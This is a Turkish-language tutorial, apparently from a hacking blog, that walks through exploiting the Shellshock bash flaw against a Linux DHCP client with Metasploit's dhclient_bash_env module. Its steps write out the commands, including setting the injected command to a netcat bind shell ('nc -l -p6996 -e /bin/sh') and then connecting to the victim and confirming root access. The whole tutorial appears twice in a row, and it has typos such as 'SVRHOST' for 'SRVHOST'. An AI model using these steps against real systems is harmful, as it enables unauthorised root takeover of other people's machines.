[font='Droid Sans', 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif]Milyonlarca sistemi saldırıya açık hale getiren büyük bir güvenlik açığı olarak görünmektedir. Shellshock, temelde gezegen üzerindeki her Mac OS X, Linux ve UNIX sistemini savunmasız bırakır. Dünya gezegeni üzerindeki tüm web sunucularının neredeyse üçte ikisi bu işletim sistemlerinden birini (esas olarak Linux) çalıştırdığından hasat edilmeyi bekleyen çok fazla sayıda sistem vardır.Bu güvenlik açığı, Temelde, Linux, Unix ve Mac OS X'in neredeyse her biçimine "uzaktan kod yürütme" karşı savunmasız kalır. Bu, bilgisayar korsanının kendi kodunu uzaktan çalıştırabilmesi ve temelde sahip olduğu sistemde bütün istediklerini yapabilmesi anlamına gelmektedir.
Shellshock , bu güvenlik açığının kapsamını anlamaya başladıkça, sistemlerin düzeltilmesi çabalarına rağmen uzunca bir süre bizimle olacak . Yeni bir düzeltme eki her çıktığında, her gün yeni güvenlik açıkları keşfedildiğinde, hemen hemen derhal kullanılmaz hale gelir. Konseptin ilk kanıtı , savunmasız sistem üzerinde bir CGI betiği çalıştırmaktı ancak bu yalnızca güvenlik açığıyla yapılabileceklerin yüzeyini çiziyor.
Çoğu ağ ve güvenlik yöneticisi, sistemlerini düzelttiklerini ve güvenli olduklarını düşünürler.Bu güvenlik açığı BASH kabuğuna ve yaptığı tüm sistem çağrılarına bağlıdır. Bu liste çok uzun! Muhtemelen binlerce yardımcı program ve uygulama, BASH'ı sistem çağrıları için kullanıyor olabilir. Ayrıca, güvenlik sistemlerinden otomobillere, otomatik aydınlatma sistemlerine kadar olan gömülü sistemlerin neredeyse tümü, bir BASH kabuğu ile birlikte bir takım Linux kullanmaktadır.
Tabii ki BT güvenlik yöneticilerinin tüm endüstrisi şimdi bu deliği kapatmaya çabalıyor. Yıllarca tecrübe ederek bana birçok insan bunu yapmayacağını ve birçok kişinin de bunu kapattıklarını düşünüyor. (BT mesleklerinde olduğu gibi diğer mesleklerde de güvenlik güçleri arasında yetersizlik var).
Kısa bir süre önce Metasploit geliştiricileri olan Rapid7'deki arkadaşlarımız, keşfedilen Shellshock güvenlik açıklarından birini, yani Apache sunucusuna CGI komut dosyaları göndermek için BASH kabuğunun kullanılması olan hızlı ve kirli bir modülü kullanıma sundu . Buna ek olarak, DHCP servisini kullanarak Shellshock'u kullanmamızı sağlayan bir modül geliştirdiler . Bir Linux sistemine saldırmak ve bunu nasıl çalıştığını görmek için bir göz atalım.
1. ADIM : Metasploit'i başlatma
Kali Linux'u ateşleyen Metasploit'i başlatarak başlayalım . Aşağıdaki ekrana benzer bir ekranla karşılaşacaksınız.
2. ADIM : Metasploit'i güncelleme
Bu yeni bir Meatsploit modülü olduğundan, Kali'yi indirirken Metasploit Çerçevesinde değil, bu nedenle Metasploit'i güncellememiz gerekiyor. Bir terminal açın ve şu komutu yazın:
kali> msfupdate
3. ADIM : Exploit'i bulmak
Şimdi Metasploit'imizi güncelledik ve muhtemelen yeni Shellshock modüllerini indirdik, bu yeni keşfi bulalım. Metasploit çerçevesinde şunu yazın:
msf > search shellshock
Gördüğümüz gibi, Metasploit , Shellshock güvenlik açığı kullanarak DHCP istemcisine saldırmak için yardımcı modül bulmuştur.Şimdi şunu yazarak bu modülü yükleyelim:
msf > use auxiliary/server/dhclient/dhclient_bash_env
Şimdi, bu modül hakkında daha fazla bilgi almak için bilgi yazalım:
msf > info
Bu modülün çeşitli seçeneklerinin her birinin üstündeki ekran görüntüsünde ve bu konuyla ilgili bazı temel bilgileri görebiliyoruz. Anahtar parametreler şunlardır: CMD, SRVHOST ve NETMASK.
4. ADIM : Modül parametrelerini ayarlamak
Şimdi, seçenekleri gösterelim.Bunun için:
msf > show options
Önce, DHCP sunucusunun IP'sini ayarlayalım. Bu SRVHOST parametresi.
msf > set SVRHOST 192.168.131.254
Sonra, BASH kabuğundan enjekte etmek istediğimiz kodu ayarlayalım. Her ne kadar bu modül varsayılanı olarak bir netcat komutu ile birlikte gelse de , bulduğumuz bir komutla onu daha iyi ve daha güvenilir sonuçlar vermesi için biraz değiştirelim.
msf > set CMD /bin/nc -l -p6996 -e /bin/sh
Son olarak, NETMASK'ı ayarlayalım.
msf > set NETMASK 255.255.255.0
Modülü çalıştırmak için "exploit" yazmanız yeterlidir.
msf > exploit
Bunu yaptığımızda "Yardımcı modül yürütülmesi tamamlandı" mesajını alıyoruz. Bizim durumumuzda, bu sadece Kabuk Şok güvenlik açığını kullanarak CMD hattını çalıştırmamız anlamına geliyordu ki, 6996 numaralı bağlantı noktasındaki kök ayrıcalıklarına sahip bir netcat dinleyicisi kurmayı kimin seçeceğine göre bir BASH kabuğuna yerleştirdi!
5. ADIM : İstenilen sisteme bağlanmak
Artık savunmasız sisteme netcat enjekte ettik. Bu makineye yönetimsel / root yetkileri ile uzaktan bağlanabilmeliyiz. O zaman o makineye sahip olurduk!Gösterim amaçlı olarak, netcat dinleyicisine bağlanarak bu sisteme Windows makinesiyle uzaktan bağlanalım. İlk olarak, Windows sisteminde bir komut istemi açın ve şunu yazın:
c::\nc 192.168.131.129 6996
Bunu yaptığımızda boş bir satır döndürür. "Ifconfig" yazdığımızda:
ifconfig
İstismar edilen Linux sisteminin ağ ayarlarını döndürür. Şimdi ayrıcalık düzeyimizi teyit etmek için, "whoami" yazalım:
whoami
Bu ekran görüntüsünde, yalnızca uzaktan sisteme erişebildiğimizi değil, aynı zamanda root yetkilerine sahip olduğumuzu görebilirsiniz. Çünkü bu sistemin sahibi bizdik!
Shellshock güvenlik açığı UNIX, Linux veya Mac OS X'in bir sürümünü çalıştıran neredeyse tüm sistemi sömürüye açık hale getirir. Güvenlik açığı BASH kabuğuyla ve sistem çağrılarıyla ilişkili olduğu için güvenlik açığı ve istismar sayısı neredeyse sayısız hale gelecektir.Bunu kesmek için DHCP istemcisi BASH sistemi çağrısı kullanıyor, ancak bu sadece bir çok potansiyel exploitten biridir. Apple ve önde gelen Linux dağıtımları tümüyle yamalar yayınladı, ancak bu yamaları atlatmanın hala sayısız yolu var.
--
Shellshock , bu güvenlik açığının kapsamını anlamaya başladıkça, sistemlerin düzeltilmesi çabalarına rağmen uzunca bir süre bizimle olacak . Yeni bir düzeltme eki her çıktığında, her gün yeni güvenlik açıkları keşfedildiğinde, hemen hemen derhal kullanılmaz hale gelir. Konseptin ilk kanıtı , savunmasız sistem üzerinde bir CGI betiği çalıştırmaktı ancak bu yalnızca güvenlik açığıyla yapılabileceklerin yüzeyini çiziyor.
Çoğu ağ ve güvenlik yöneticisi, sistemlerini düzelttiklerini ve güvenli olduklarını düşünürler.Bu güvenlik açığı BASH kabuğuna ve yaptığı tüm sistem çağrılarına bağlıdır. Bu liste çok uzun! Muhtemelen binlerce yardımcı program ve uygulama, BASH'ı sistem çağrıları için kullanıyor olabilir. Ayrıca, güvenlik sistemlerinden otomobillere, otomatik aydınlatma sistemlerine kadar olan gömülü sistemlerin neredeyse tümü, bir BASH kabuğu ile birlikte bir takım Linux kullanmaktadır.
Tabii ki BT güvenlik yöneticilerinin tüm endüstrisi şimdi bu deliği kapatmaya çabalıyor. Yıllarca tecrübe ederek bana birçok insan bunu yapmayacağını ve birçok kişinin de bunu kapattıklarını düşünüyor. (BT mesleklerinde olduğu gibi diğer mesleklerde de güvenlik güçleri arasında yetersizlik var).
Kısa bir süre önce Metasploit geliştiricileri olan Rapid7'deki arkadaşlarımız, keşfedilen Shellshock güvenlik açıklarından birini, yani Apache sunucusuna CGI komut dosyaları göndermek için BASH kabuğunun kullanılması olan hızlı ve kirli bir modülü kullanıma sundu . Buna ek olarak, DHCP servisini kullanarak Shellshock'u kullanmamızı sağlayan bir modül geliştirdiler . Bir Linux sistemine saldırmak ve bunu nasıl çalıştığını görmek için bir göz atalım.
1. ADIM : Metasploit'i başlatma
Kali Linux'u ateşleyen Metasploit'i başlatarak başlayalım . Aşağıdaki ekrana benzer bir ekranla karşılaşacaksınız.
2. ADIM : Metasploit'i güncelleme
Bu yeni bir Meatsploit modülü olduğundan, Kali'yi indirirken Metasploit Çerçevesinde değil, bu nedenle Metasploit'i güncellememiz gerekiyor. Bir terminal açın ve şu komutu yazın:
kali> msfupdate
3. ADIM : Exploit'i bulmak
Şimdi Metasploit'imizi güncelledik ve muhtemelen yeni Shellshock modüllerini indirdik, bu yeni keşfi bulalım. Metasploit çerçevesinde şunu yazın:
msf > search shellshock
Gördüğümüz gibi, Metasploit , Shellshock güvenlik açığı kullanarak DHCP istemcisine saldırmak için yardımcı modül bulmuştur.Şimdi şunu yazarak bu modülü yükleyelim:
msf > use auxiliary/server/dhclient/dhclient_bash_env
Şimdi, bu modül hakkında daha fazla bilgi almak için bilgi yazalım:
msf > info
Bu modülün çeşitli seçeneklerinin her birinin üstündeki ekran görüntüsünde ve bu konuyla ilgili bazı temel bilgileri görebiliyoruz. Anahtar parametreler şunlardır: CMD, SRVHOST ve NETMASK.
4. ADIM : Modül parametrelerini ayarlamak
Şimdi, seçenekleri gösterelim.Bunun için:
msf > show options
Önce, DHCP sunucusunun IP'sini ayarlayalım. Bu SRVHOST parametresi.
msf > set SVRHOST 192.168.131.254
Sonra, BASH kabuğundan enjekte etmek istediğimiz kodu ayarlayalım. Her ne kadar bu modül varsayılanı olarak bir netcat komutu ile birlikte gelse de , bulduğumuz bir komutla onu daha iyi ve daha güvenilir sonuçlar vermesi için biraz değiştirelim.
msf > set CMD /bin/nc -l -p6996 -e /bin/sh
Son olarak, NETMASK'ı ayarlayalım.
msf > set NETMASK 255.255.255.0
Modülü çalıştırmak için "exploit" yazmanız yeterlidir.
msf > exploit
Bunu yaptığımızda "Yardımcı modül yürütülmesi tamamlandı" mesajını alıyoruz. Bizim durumumuzda, bu sadece Kabuk Şok güvenlik açığını kullanarak CMD hattını çalıştırmamız anlamına geliyordu ki, 6996 numaralı bağlantı noktasındaki kök ayrıcalıklarına sahip bir netcat dinleyicisi kurmayı kimin seçeceğine göre bir BASH kabuğuna yerleştirdi!
5. ADIM : İstenilen sisteme bağlanmak
Artık savunmasız sisteme netcat enjekte ettik. Bu makineye yönetimsel / root yetkileri ile uzaktan bağlanabilmeliyiz. O zaman o makineye sahip olurduk!Gösterim amaçlı olarak, netcat dinleyicisine bağlanarak bu sisteme Windows makinesiyle uzaktan bağlanalım. İlk olarak, Windows sisteminde bir komut istemi açın ve şunu yazın:
c::\nc 192.168.131.129 6996
Bunu yaptığımızda boş bir satır döndürür. "Ifconfig" yazdığımızda:
ifconfig
İstismar edilen Linux sisteminin ağ ayarlarını döndürür. Şimdi ayrıcalık düzeyimizi teyit etmek için, "whoami" yazalım:
whoami
Bu ekran görüntüsünde, yalnızca uzaktan sisteme erişebildiğimizi değil, aynı zamanda root yetkilerine sahip olduğumuzu görebilirsiniz. Çünkü bu sistemin sahibi bizdik!
Shellshock güvenlik açığı UNIX, Linux veya Mac OS X'in bir sürümünü çalıştıran neredeyse tüm sistemi sömürüye açık hale getirir. Güvenlik açığı BASH kabuğuyla ve sistem çağrılarıyla ilişkili olduğu için güvenlik açığı ve istismar sayısı neredeyse sayısız hale gelecektir.Bunu kesmek için DHCP istemcisi BASH sistemi çağrısı kullanıyor, ancak bu sadece bir çok potansiyel exploitten biridir. Apple ve önde gelen Linux dağıtımları tümüyle yamalar yayınladı, ancak bu yamaları atlatmanın hala sayısız yolu var.
--

